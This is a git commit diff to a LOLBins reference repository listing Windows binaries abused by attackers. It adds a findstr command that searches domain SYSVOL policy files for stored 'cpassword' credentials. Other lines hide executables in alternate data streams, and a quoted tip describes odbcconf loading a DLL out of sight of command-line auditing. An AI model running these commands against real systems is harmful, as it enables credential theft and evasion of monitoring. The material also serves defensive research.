Added and adjusted

api0cradle · api0cradle · commit dea250c7547e · 2018-04-20T15:31:50.000+02:00
diff --git a/.gitignore b/.gitignore
@@ -0,0 +1 @@
+"notes.txt" 
diff --git a/Contribute.md b/Contribute.md
@@ -4,7 +4,7 @@ to send me a tweet and I will add the contribution for you.
 
 ## Binary.exe
 
-* Functions: Execute
+* Functions: Execute, Download, Copy, Read ADS, Write ADS, UACBypass, Search
 
 ```
 Example
diff --git a/LOLBins.md b/LOLBins.md
@@ -40,6 +40,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 [Regasm.exe](OSBinaries/Regasm.md)    
 [Regsvcs.exe](OSBinaries/Regsvcs.md)    
 [Regsvr32.exe](OSBinaries/Regsvr32.md)    
+[Robocopy.exe](OSBinaries/Robocopy.md)    
 [Replace.exe](OSBinaries/Replace.md)     
 [Rundll32.exe](OSBinaries/Rundll32.md)   
 [Runscripthelper.exe](OSBinaries/Runscripthelper.md)     
diff --git a/OSBinaries/Findstr.md b/OSBinaries/Findstr.md
@@ -1,11 +1,13 @@
 ## Findstr.exe
 
-* Functions: Add ADS
+* Functions: Add ADS, Search
 
 ```
 findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe    
 
 findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe    
+
+findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
 ```
 
 Acknowledgements:
diff --git a/OSBinaries/Odbcconf.md b/OSBinaries/Odbcconf.md
@@ -16,6 +16,7 @@ Code sample:
 Resources:
 * https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b    
 * https://github.com/woanware/application-restriction-bypasses    
+* https://twitter.com/subTee/status/789459826367606784    
 
 Full path:
 ```
@@ -24,6 +25,9 @@ c:\windows\sysWOW64\odbcconf.exe
 ```
 
 Notes:
-Samples can be found in the resources.
-
+Text from @subtee tweet:
+```
+Loads Dll from path in my.rsp.
+Hide from command line auditing watching for regsvr32
+```
  
diff --git a/OSBinaries/Robocopy.md b/OSBinaries/Robocopy.md
@@ -0,0 +1,28 @@
+## Robocopy.exe
+
+* Functions: Copy
+
+```
+Robocopy.exe - Needs example
+```
+
+Acknowledgements:
+* Name of guy - @twitterhandle
+
+Code sample:
+* [NameOfLink](Payload/NameOfPayload)
+
+Resources:
+* https://linktosomethingusefull.com
+
+Full path:
+```
+c:\windows\system32\binary.exe
+c:\windows\sysWOW64\binary.exe
+```
+
+Notes:
+Some specific details about the binary file.
+
+
+ 
diff --git a/notes.txt b/notes.txt
@@ -0,0 +1 @@
+test
